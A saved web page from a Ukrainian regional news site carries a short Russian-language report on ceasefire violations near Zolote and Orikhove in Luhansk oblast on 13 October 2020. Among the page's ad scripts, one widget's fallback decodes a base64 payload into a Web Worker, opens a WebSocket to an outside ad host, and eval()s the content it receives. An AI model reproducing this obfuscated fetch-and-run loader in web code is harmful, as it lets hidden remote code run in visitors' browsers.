<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head>

<meta charset="utf-8">
<title>13 октября российские террористы обстреляли Золотое и Орехово в Луганской области &raquo; Новости Луганска и Луганской области. Луганские новости сегодня</title>
<meta name="description" content="В Луганской области боевики обстреляли позиции ВСУ из автоматического станкового гранатомета в районе населенного пункта Орехово. 13 октября российские террористы шесть раз нарушили договоренности о прекращении огня, которые вступили в действие 27 июля 2020 года.В Луганской области боевики">
<meta name="keywords" content="гранатомета, российские, боевики, области, районе, Луганской, противотанкового, стрелкового, стороны, ручного, террористы, Орехово, станкового, обстреляли, позиции, автоматического, огонь, населенного, пункта, Боевых">
<meta name="generator" content="DataLife Engine (http://dle-news.ru)">
<meta property="og:site_name" content="Новости Луганска и Луганской области. Луганские новости сегодня">
<meta property="og:type" content="article">
<meta property="og:title" content="13 октября российские террористы обстреляли Золотое и Орехово в Луганской области">
<meta property="og:url" content="http://www.citynews.net.ua/news/84945-13-oktjabrja-rossijskie-terroristy-obstreljali-zolotoe-i-orehovo-v-luganskoj-oblasti.html">
<meta property="og:image" content="http://www.citynews.net.ua/uploads/posts/2020-10/medium/1602667001_mina.jpg">
<meta property="og:description" content="13 октября российские террористы шесть раз нарушили договоренности о прекращении огня, которые вступили в действие 27 июля 2020 года. В Луганской области боевики обстреляли позиции ВСУ из автоматического станкового гранатомета в районе населенного пункта Орехово. По окраинам города Золотое в районе">
<link rel="search" type="application/opensearchdescription+xml" href="http://www.citynews.net.ua/index.php?do=opensearch" title="Новости Луганска и Луганской области. Луганские новости сегодня">
<link rel="canonical" href="http://www.citynews.net.ua/news/84945-13-oktjabrja-rossijskie-terroristy-obstreljali-zolotoe-i-orehovo-v-luganskoj-oblasti.html">
<link rel="alternate" type="application/rss+xml" title="Новости Луганска и Луганской области. Луганские новости сегодня" href="http://www.citynews.net.ua/rss.xml">
<link href="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/editor/css/default.css&amp;v=25" rel="stylesheet" type="text/css">
<script src="/engine/classes/min/index.php?charset=utf-8&amp;g=general&amp;v=25"></script>
<script src="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/classes/js/jqueryui.js,engine/classes/js/dle_js.js&amp;v=25" defer></script>
   <meta name="robots" content="index, follow" />
	<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
	<link rel="stylesheet" href="/engine/classes/min/index.php?charset=windows-1251&amp;f=/v2screen.css,/templates/v2/style/engine.css&amp;7" />
	<script type="text/javascript" src="/engine/classes/min/index.php?charset=windows-1251&amp;f=/templates/v2/js/libs.js&amp;7"></script>


</head>
<body>
<div id="header">
	<div class="logo"><a href="/" title="Новости Украины">CityNews</a><h1>Новости Украины</h1></div><div class="sbs"><a href="https://www.facebook.com/lugansk.news" class="fb" rel="nofollow"> </a><a href="https://twitter.com/NewsLugansk" class="twi" rel="nofollow"> </a><a href="https://plus.google.com/110576264707339910234/posts" class="gog" rel="nofollow"> </a><a href="/rss.xml" class="rss"> </a>
	  <form action="" name="searchform" method="post">
			<input type="hidden" name="do" value="search" />
			<input type="hidden" name="subaction" value="search" />
					<div class="sffu">	<input id="story" name="story" value="Поиск..." onblur="if(this.value=='') this.value='Поиск...';" onfocus="if(this.value=='Поиск...') this.value='';" type="text" /></div><div class="sfbu"> <input type="image" style="width:25px; height:25px; border:0" src="/images/search.gif"/></div>
				
			
	  </form></div>
</div>
   <nav class="nav"><div id="menu">	<ul>
		<li><a href="/news/" title="Новости Луганска и Луганской области">Новости Луганска </a></li>
		<li><a href="/econom/">Экономика</a></li>
        <li><a href="/polit/">Политика</a></li>
		<li><a href="/sport/">Спорт</a></li>
        <li><a href="/ukrainenews/kiev/" title="Новости Киева и Киевской области">Новости Киева</a></li>
		<li><a href="/ukrainenews/odessa/" title="Новости Одессы и Одесской области">Новости Одессы</a></li>
		<li><a href="/reklama.html">Реклама на сайте</a></li>
        <li><a href="/taxnews/">Пресс-релизы</a></li>
	</ul></div></nav>
<div class="all">
<div class="colmask blogstyle">
	<div class="colmid">
		<div class="colleft">
			<div class="col1">
 
  
<!-- Яндекс.Директ -->
<div id="yandex_ad"></div>
<script type="text/javascript">
(function(w, d, n, s, t) {
    w[n] = w[n] || [];
    w[n].push(function() {
        Ya.Direct.insertInto(139323, "yandex_ad", {
            ad_format: "direct",
            font_size: 0.8,
            type: "horizontal",
            limit: 2,
            title_font_size: 1,
            links_underline: true,
            site_bg_color: "FFFFFF",
            title_color: "0000CC",
            url_color: "006600",
            text_color: "000000",
            hover_color: "0066FF",
            no_sitelinks: true
        });
    });
    t = d.getElementsByTagName("script")[0];
    s = d.createElement("script");
    s.src = "//an.yandex.ru/system/context.js";
    s.type = "text/javascript";
    s.async = true;
    t.parentNode.insertBefore(s, t);
})(window, document, "yandex_context_callbacks");
</script><div class="speedbar"><span id="dle-speedbar"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://www.citynews.net.ua/" itemprop="url"><span itemprop="title">Новости Луганска</span></a></span> &raquo; <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://www.citynews.net.ua/news/" itemprop="url"><span itemprop="title">Новости Луганска</span></a></span> &raquo; 13 октября российские террористы обстреляли Золотое и Орехово в Луганской области</span></div>

<div id='dle-content'><div class="fulls">
<article><h1>13 октября российские террористы обстреляли Золотое и Орехово в Луганской области</h1>
<a href="http://www.citynews.net.ua/2020/10/14/" ><span class="date">Вчера, 12:16</span></a> <span class="date" style="float:right"><noindex><a href=http://citynews.net.ua rel=nofollow>citynews.net.ua</a></noindex>
 | <a href="http://www.citynews.net.ua/news/print:page,1,84945-13-oktjabrja-rossijskie-terroristy-obstreljali-zolotoe-i-orehovo-v-luganskoj-oblasti.html" rel="nofollow">Напечатать</a> </span>
<div class="share42init" data-url="http://www.citynews.net.ua/news/84945-13-oktjabrja-rossijskie-terroristy-obstreljali-zolotoe-i-orehovo-v-luganskoj-oblasti.html" data-title="13 октября российские террористы обстреляли Золотое и Орехово в Луганской области"></div>
<script type="text/javascript" src="http://citynews.net.ua/share42/share42.js"></script> 
<div class="maincont">

			<p><img src="/uploads/posts/2020-10/medium/1602667001_mina.jpg" alt="" style="display:block;margin-left:auto;margin-right:auto;">13 октября российские террористы шесть раз нарушили договоренности о прекращении огня, которые вступили в действие 27 июля 2020 года.</p>
<p>В Луганской области боевики обстреляли позиции ВСУ из автоматического станкового гранатомета в районе населенного пункта Орехово.</p>
<p>По окраинам города Золотое в районе улицы 2-я Вольная боевики вели огонь из ручного противотанкового гранатомета и стрелкового оружия.</p>
<p>В Донецкой области российские террористы из ручного противотанкового гранатомета обстреливали Зайцево, а из гранатометов и стрелкового оружия - Пески.</p>
<p>Штаб ООС не дал разрешение на ответный огонь, поэтому украинские военные на обстрел со стороны противника оружие в ответ не применяли.</p>
<p>Боевых потерь и ранений среди украинских защитников не было.</p>
<p>Еще два нарушения достигнутых договоренностей со стороны вооруженных формирований Российской Федерации зафиксированы на Приазовье, где российские подразделения вели разведку при помощи беспилотных аппаратов.</p>
            <br />
<script type="text/javascript"><!--
google_ad_client = "pub-1002459357691458";
/* 468x60, создано 28.05.10 */
google_ad_slot = "0880908263";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
			<div class="clr"></div>


		
		
	</div>
	<div class="related">
		<div class="dtop"><span><b>Другие новости по теме:</b></span></div>	
		<ul class="reset">
			<li><a href="http://www.citynews.net.ua/news/84935-rossijskie-terroristy-7-raz-obstrelivali-pozicii-vsu-iz-granatometov-i-pulemetov.html">Российские террористы 7 раз обстреливали позиции ВСУ из гранатометов и пулеметов</a></li><li><a href="http://www.citynews.net.ua/news/84924-11-oktjabrja-rossijskie-terroristy-chetyre-raza-obstrelivali-ukrainskih-voennyh.html">11 октября российские террористы четыре раза обстреливали украинских военных</a></li><li><a href="http://www.citynews.net.ua/news/82978-13-fevralja-vooruzhennye-formirovanija-rossijskoj-federacii-6-raz-narushili-rezhim-prekraschenija-ognja.html">13 февраля вооруженные формирования Российской Федерации 6 раз нарушили режим прекращения огня</a></li><li><a href="http://www.citynews.net.ua/news/82933-10-fevralja-rossijskie-terroristy-obstrelivali-zolotoe-i-orehovo-v-luganskoj-oblasti.html">10 февраля российские террористы обстреливали Золотое и Орехово в Луганской области</a></li><li><a href="http://www.citynews.net.ua/news/82766-v-luganskoj-oblasti-rossijskie-terroristy-obstreljali-zolotoe.html">В Луганской области российские террористы обстреляли Золотое</a></li>
		</ul>
		<br />
	</div>
	</article>
	
</div>
<hr />
<br /><noindex>
<!--  News Join -->

<style>
.join_informer_1182 * { border: none; padding: 0; margin: 0; }
.join_informer_1182 { text-align:left; clear: both; padding: 5px}
.join_informer_1182 a.join_link, a.join_text {font-size: 12px;
font-family: Arial; margin-bottom:10px;
color:#0049a3;text-decoration:none; font-weight:bold;}
.join_informer_1182 a.join_link:hover, a.join_text:hover {
color:#0049a3;text-decoration:underline;}
.join_informer_1182 .join_img {width: 120px; height: 120px; }
</style>

<div class="join_informer_1182" id="join_informer_1182"></div>

<!-- Асинхронный код, 18.12.2014 -->
<script type="text/javascript">  (function() {
var i = document.createElement("script"); i.type = "text/javascript";
i.async = true; i.charset = "UTF-8";
i.src = "http://partner.join.com.ua/async/1182/";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(i, s);
})();</script>
<!--  News Join -->

<div style="height:210px"><script class="r36737" type="text/javascript">
    (function() {
        var worker36737,
            tickerID = 36737,
            tag = document.currentScript || (function() {
                var scripts = document.getElementsByClassName('r36737'),
                    len = scripts.length;
                return len ? scripts[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4),
                    idn = '';
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })();
        
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.setAttribute('class', 's36737');
            script.setAttribute('data-idn', idn);
            script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36737.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker36737.postMessage(data);
                }

                worker36737 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker36737.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker36737.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
    </script></div>

<div id="meta_news_block1815"><a href="http://news.meta.ua/" rel="nofollow"> Мета новости...</a></div><script type="text/javascript" charset="windows-1251" src="http://exchange.meta.ua/1815/block.js"></script><br /><br>

<!-- MarketNews Start -->
<div id="MarketGid2493">
<a href="http://marketgid.com/" rel="nofollow" target="_blank">Загрузка...</a>
</div>
<!-- MarketNews End -->
<!-- pered </body> -->
<script type="text/javascript">
var MarketGidDate = new Date();
document.write('<scr'+'ipt type="text/javascript" '
+'src="http://jsn.dt00.net/c/i/citynews.net.ua.2493.js?t='+MarketGidDate.getYear()+MarketGidDate.getMonth()
+ '" charset="utf-8" ></scr'+'ipt>');
</script> 

</noindex>
<div id="disqus_thread"></div>
    <script type="text/javascript">
        /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
        var disqus_shortname = 'citynews-ua'; // required: replace example with your forum shortname

        /* * * DON'T EDIT BELOW THIS LINE * * */
        (function() {
            var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
            dsq.src = 'http://' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        })();
    </script>
   
    <noindex><a href="http://disqus.com" rel="nofollow" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a></noindex>
<!--dlenavigationcomments--></div>
				<!-- Column 1 end -->
			</div>
			<div class="col2">
				
				<h3 class="ra">Новости Луганска:</h3>
                <span>Вчера, 12:16</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/84945-13-oktjabrja-rossijskie-terroristy-obstreljali-zolotoe-i-orehovo-v-luganskoj-oblasti.html">13 октября российские террористы обстреляли Золотое и Орехово в Луганской области</a></h4><span>13-10-2020, 15:04</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/84943-okkupirovannye-rovenki-13-oktjabrja-ostanutsja-bez-vody.html">Оккупированные Ровеньки 13 октября останутся без воды</a></h4><span>13-10-2020, 13:47</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/84941-oficialno-s-15-oktjabrja-kpvv-v-stanice-luganskoj-prekraschaet-propusk-grazhdan.html">Официально: С 15 октября КПВВ в Станице Луганской прекращает пропуск граждан</a></h4><span>13-10-2020, 13:21</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/84940-v-lisichanske-sostojatsja-antiterroristicheskie-uchenija.html">В Лисичанске состоятся антитеррористические учения</a></h4><span>13-10-2020, 11:45</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/84939-na-kpvv-v-stanice-luganskoj-umer-pensioner.html">На КПВВ в Станице Луганской умер пенсионер</a></h4><span>13-10-2020, 10:08</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/84938-zhiteli-luganskoj-oblasti-mogut-poobschatsja-s-dalaj-lamoj-v-prjamom-jefire.html">Жители Луганской области могут пообщаться с Далай-ламой в прямом эфире</a></h4><span>13-10-2020, 10:03</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/84937-dlja-zhitelej-toshkovki-ustanovili-novyj-tarif-na-otoplenie-v-sezon-2020-2021-goda.html">Для жителей Тошковки установили новый тариф на отопление в сезон 2020-2021 года</a></h4><span>13-10-2020, 09:41</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/84936-v-luganskoj-oblasti-65-novyh-sluchaev-covid-19-umerli-3-cheloveka.html">В Луганской области 65 новых случаев COVID-19. Умерли 3 человека</a></h4><span>13-10-2020, 09:31</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/84935-rossijskie-terroristy-7-raz-obstrelivali-pozicii-vsu-iz-granatometov-i-pulemetov.html">Российские террористы 7 раз обстреливали позиции ВСУ из гранатометов и пулеметов</a></h4><span>12-10-2020, 17:42</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/84934-frontovaja-katerinovka-samoe-strashnoe-to-chto-zdes-net-nikakoj-nadezhdy.html">Фронтовая Катериновка: Самое страшное то, что здесь нет никакой надежды</a></h4><span>12-10-2020, 15:52</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/84933-farmbiotest-iz-luganskoj-oblasti-naladil-sotrudnichestvo-s-polskimi-partnerami-dlja-protivodejstvija-covid-19.html">«Фармбиотест» из Луганской области  наладил сотрудничество с польскими партнерами для противодействия COVID-19</a></h4><span>12-10-2020, 14:59</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/84932-v-luganskoj-oblasti-nachali-dejstvovat-ogranichenija-oranzhevoj-zony-karantina.html">В  Луганской области начали действовать ограничения «оранжевой» зоны карантина</a></h4>
                <hr />
                <h3 class="ra">Новости Украины:</h3>
                <span>13-10-2020, 17:07</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/84944-sbu-zaderzhala-na-vzjatke-nachalnika-otdela-tamozhennogo-oformlenija-posta-kiev-zapadnyj.html">СБУ задержала на взятке начальника отдела таможенного оформления поста «Киев-западный»</a></h4><span>13-10-2020, 14:53</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/84942-magazin-zhenskoj-odezhdy-idet-v-nol-chto-delat.html">Магазин женской одежды идет в ноль - Что делать?</a></h4><span>12-10-2020, 14:51</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/84931-v-odesse-perekrojut-centr-goroda-iz-za-vizita-prezidentov-ukrainy-i-polshi.html">В Одессе перекроют центр города из-за визита президентов Украины и Польши</a></h4><span>12-10-2020, 14:41</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/84930-kievskie-shkolniki-ujdut-na-kanikuly-s-21-oktjabrja.html">Киевские школьники уйдут на каникулы с 21 октября</a></h4><span>12-10-2020, 10:36</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/84926-v-kieve-mitingovali-za-prava-lgbt-i-ih-protivniki.html">В Киеве митинговали за права ЛГБТ и их противники</a></h4><span>7-10-2020, 16:03</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/84890-rossija-pytalas-zaverbovat-zhitelja-chernigovskoj-oblasti.html">Россия пыталась завербовать жителя Черниговской области</a></h4><span>7-10-2020, 14:34</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/84889-odesskogo-sudju-zaochno-prigovorili-k-9-godam-tjurmy-s-konfiskaciej.html">Одесского судью заочно приговорили к 9 годам тюрьмы с конфискацией</a></h4><span>7-10-2020, 14:15</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/84888-polsha-oshtrafovala-gazprom-i-ego-5-partnerov-na-76-mlrd-dollarov-za-stroitelstvo-severnogo-potoka-2.html">Польша оштрафовала «Газпром» и его 5 партнеров на 7,6 млрд долларов за строительство «Северного потока-2»</a></h4><span>6-10-2020, 10:35</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/84876-za-rabotu-na-burovyh-ustanovka-v-okkupirovannom-krymu-pomoschnika-kapitana-budut-sudit-v-ukraine.html">За работу на буровых установка в оккупированном Крыму помощника капитана будут судить в Украине</a></h4><span>2-10-2020, 10:36</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/84842-v-dnepre-baza-dannyh-pacientov-krupnejshej-kliniki-popala-v-otkrytyj-dostup.html">В Днепре база данных пациентов крупнейшей клиники попала в открытый доступ</a></h4><span>25-09-2020, 17:29</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/84784-srazu-3-narodnyh-deputata-hotjat-stat-mjerom-kieva.html">Сразу 3 народных депутата хотят стать мэром Киева</a></h4><span>25-09-2020, 17:25</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/84783-medvedchuk-vybral-kandidata-v-mjery-nikolaeva-ot-opzzh-pokazav-kto-na-samom-dele-rukovodit-partiej-jekspert.html">Медведчук выбрал кандидата в мэры Николаева от ОПЗЖ, показав, кто на самом деле руководит партией - эксперт</a></h4>
				
			</div>
			<div class="col3">
			
      
				<div id="ads"><h3 class="ra">Разное:</h3>
					<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-1689781-1";
urchinTracker();
</script>

  

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- rt-citynews.net.ua -->
<ins class="adsbygoogle"
     style="display:inline-block;width:240px;height:400px"
     data-ad-client="ca-pub-1002459357691458"
     data-ad-slot="6485410796"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<br />
<br />

<h3 class="ra">Реклама:</h3>
<br />
<h3 class="ra">Посмотреть:</h3>
<a href="/news/81836-novye-pravila-vezda-vyezda-s-okkupirovannymi-rajonami-luganskoj-i-doneckoj-oblastej.html" title="Документы для пересечения КПВВ в Луганске и Донецке">Новые правила въезда-выезда с оккупированными районами Луганской и Донецкой областей</a> <br />
<a href="http://citynews.net.ua/internet-shop-lugansk.html">Интернет-магазин в Луганске</a><br />
<a href="http://www.citynews.net.ua/weather_lugansk.html">Погода в Луганске</a><br />
<br />
<h3 class="ra">Архив новостей:</h3>
<p><div id="calendar-layer"><table id="calendar" class="calendar"><tr><th colspan="7" class="monthselect"><a class="monthlink" onclick="doCalendar('09','2020','right'); return false;" href="http://www.citynews.net.ua/2020/09/" title="Предыдущий месяц">&laquo;</a>&nbsp;&nbsp;&nbsp;&nbsp;Октябрь 2020&nbsp;&nbsp;&nbsp;&nbsp;&raquo;</th></tr><tr><th class="workday">Пн</th><th class="workday">Вт</th><th class="workday">Ср</th><th class="workday">Чт</th><th class="workday">Пт</th><th class="weekday">Сб</th><th class="weekday">Вс</th></tr><tr><td colspan="3">&nbsp;</td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/10/01/" title="Все публикации за 01 октября 2020">1</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/10/02/" title="Все публикации за 02 октября 2020">2</a></td><td  class="day-active" ><a class="day-active" href="http://www.citynews.net.ua/2020/10/03/" title="Все публикации за 03 октября 2020">3</a></td><td  class="day-active" ><a class="day-active" href="http://www.citynews.net.ua/2020/10/04/" title="Все публикации за 04 октября 2020">4</a></td></tr><tr><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/10/05/" title="Все публикации за 05 октября 2020">5</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/10/06/" title="Все публикации за 06 октября 2020">6</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/10/07/" title="Все публикации за 07 октября 2020">7</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/10/08/" title="Все публикации за 08 октября 2020">8</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/10/09/" title="Все публикации за 09 октября 2020">9</a></td><td  class="day-active" ><a class="day-active" href="http://www.citynews.net.ua/2020/10/10/" title="Все публикации за 10 октября 2020">10</a></td><td  class="day-active" ><a class="day-active" href="http://www.citynews.net.ua/2020/10/11/" title="Все публикации за 11 октября 2020">11</a></td></tr><tr><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/10/12/" title="Все публикации за 12 октября 2020">12</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/10/13/" title="Все публикации за 13 октября 2020">13</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/10/14/" title="Все публикации за 14 октября 2020">14</a></td><td  class="day day-current" >15</td><td  class="day" >16</td><td  class="weekday" >17</td><td  class="weekday" >18</td></tr><tr><td  class="day" >19</td><td  class="day" >20</td><td  class="day" >21</td><td  class="day" >22</td><td  class="day" >23</td><td  class="weekday" >24</td><td  class="weekday" >25</td></tr><tr><td  class="day" >26</td><td  class="day" >27</td><td  class="day" >28</td><td  class="day" >29</td><td  class="day" >30</td><td  class="weekday" >31</td><td colspan="1">&nbsp;</td></tr></table></div> </p><br />
<br />

<a href="#" title="Вернуться к началу" class="topbutton">^Наверх</a>
  <p>&nbsp;</p>
			</div>
		</div>
	</div>
</div>

<!-- Yandex.Metrika -->
<div style="display:none;"><script type="text/javascript">
(function(w, c) {
    (w[c] = w[c] || []).push(function() {
        try {
            w.yaCounter28393 = new Ya.Metrika(28393, null, 1);
             yaCounter28393.clickmap(true);
             yaCounter28393.trackLinks(true);
        
        } catch(e) {}
    });
})(window, 'yandex_metrika_callbacks');
</script></div>
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript" defer></script>
<noscript><div style="position:absolute"><img src="//mc.yandex.ru/watch/28393?cnt-class=1" alt="" /></div></noscript>
<!-- /Yandex.Metrika -->


</div>
</div>
<div id="footer">
	<div class="all"><div class="ftex">
	  <p>© 2003—2020 Citynews.net.ua - Все новости Луганска и Луганской области. Новости 
      Одессы, Киева, Харькова, Луцка. </p>
	  <p><a href="https://www.facebook.com/lugansk.news" class="fb" rel="nofollow"> </a><a href="https://twitter.com/NewsLugansk" class="twi" rel="nofollow"> </a><a href="https://plus.google.com/110576264707339910234/posts" class="gog" rel="nofollow"> </a><a href="/rss.xml" class="rss"> </a></p>
	  <p style="line-height:13px">	  
</p><br />

	  <p><a href="/note/"> ЗАМЕТКИ </a></p>
    </div>
    <div class="ftex">
	  <p>Использование материалов Citynews.Net.UA разрешается и приветствуется при условии наличия ссылки (для интернет-изданий — гиперссылки) на <a href="http://citynews.net.ua" title="Новости Украины">Citynews.net.ua</a>. </p>
	  <p>Перепечатка, копирование или воспроизведение информации, содержащей ссылку на агентство "УНН" в каком-либо виде строго запрещено.</p>
        <p>Материалы отмеченные рубрикой Пресс-релизы и Заметки публикуются на правах рекламы</p>
  </div>
      <div class="ftex wli">
	  <p> <a href="/sitemap.xml">Sitemap</a> | <a href="/reklama.html">Контакты</a> </p>
	  <p>
          <nobr><div style="display:none"><!-- bigmir)net TOP 100 --><a href="http://www.bigmir.net/?cl=56861" target=_blank rel=nofollow><script language="javascript"><!--
bmQ='<img src=http://c.bigmir.net/?s56861&t5';bmD=document;bmD.cookie="b=b";if(bmD.cookie)bmQ+='&c1'
//--></script><script language="javascript1.2"><!--
bmS=screen;bmQ+='&d'+(bmS.colorDepth?bmS.colorDepth:bmS.pixelDepth)+"&r"+bmS.width;
//--></script><script language="javascript"><!--
bmF = bmD.referrer.slice(7);((bmI=bmF.indexOf('/'))!=-1)?(bmF=bmF.substring(0,bmI)):(bmI=bmF.length);if(bmF!=window.location.href.substring(7,7+bmI))bmQ+='&f'+escape(bmD.referrer);bmD.write(bmQ+" border=0 width=88 height=31 alt='bigmir TOP100'>");
              //--></script></a></div>&nbsp;
<!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click' "+
"rel=nofollow><img src='//counter.yadro.ru/hit?t52.2;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров и"+
" посетителей за 24 часа' "+
"border='0' width='88' height='31'><\/a>")
//--></script><!--/LiveInternet--><br /></p>
  </div></div>
</div>



<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/uk_UA/sdk.js#xfbml=1&amp;version=v2.5";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
<meta charset="utf-8">
<title>13 октября российские террористы обстреляли Золотое и Орехово в Луганской области &raquo; Новости Луганска и Луганской области. Луганские новости сегодня</title>
<meta name="description" content="В Луганской области боевики обстреляли позиции ВСУ из автоматического станкового гранатомета в районе населенного пункта Орехово. 13 октября российские террористы шесть раз нарушили договоренности о прекращении огня, которые вступили в действие 27 июля 2020 года.В Луганской области боевики">
<meta name="keywords" content="гранатомета, российские, боевики, области, районе, Луганской, противотанкового, стрелкового, стороны, ручного, террористы, Орехово, станкового, обстреляли, позиции, автоматического, огонь, населенного, пункта, Боевых">
<meta name="generator" content="DataLife Engine (http://dle-news.ru)">
<meta property="og:site_name" content="Новости Луганска и Луганской области. Луганские новости сегодня">
<meta property="og:type" content="article">
<meta property="og:title" content="13 октября российские террористы обстреляли Золотое и Орехово в Луганской области">
<meta property="og:url" content="http://www.citynews.net.ua/news/84945-13-oktjabrja-rossijskie-terroristy-obstreljali-zolotoe-i-orehovo-v-luganskoj-oblasti.html">
<meta property="og:image" content="http://www.citynews.net.ua/uploads/posts/2020-10/medium/1602667001_mina.jpg">
<meta property="og:description" content="13 октября российские террористы шесть раз нарушили договоренности о прекращении огня, которые вступили в действие 27 июля 2020 года. В Луганской области боевики обстреляли позиции ВСУ из автоматического станкового гранатомета в районе населенного пункта Орехово. По окраинам города Золотое в районе">
<link rel="search" type="application/opensearchdescription+xml" href="http://www.citynews.net.ua/index.php?do=opensearch" title="Новости Луганска и Луганской области. Луганские новости сегодня">
<link rel="canonical" href="http://www.citynews.net.ua/news/84945-13-oktjabrja-rossijskie-terroristy-obstreljali-zolotoe-i-orehovo-v-luganskoj-oblasti.html">
<link rel="alternate" type="application/rss+xml" title="Новости Луганска и Луганской области. Луганские новости сегодня" href="http://www.citynews.net.ua/rss.xml">
<link href="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/editor/css/default.css&amp;v=25" rel="stylesheet" type="text/css">
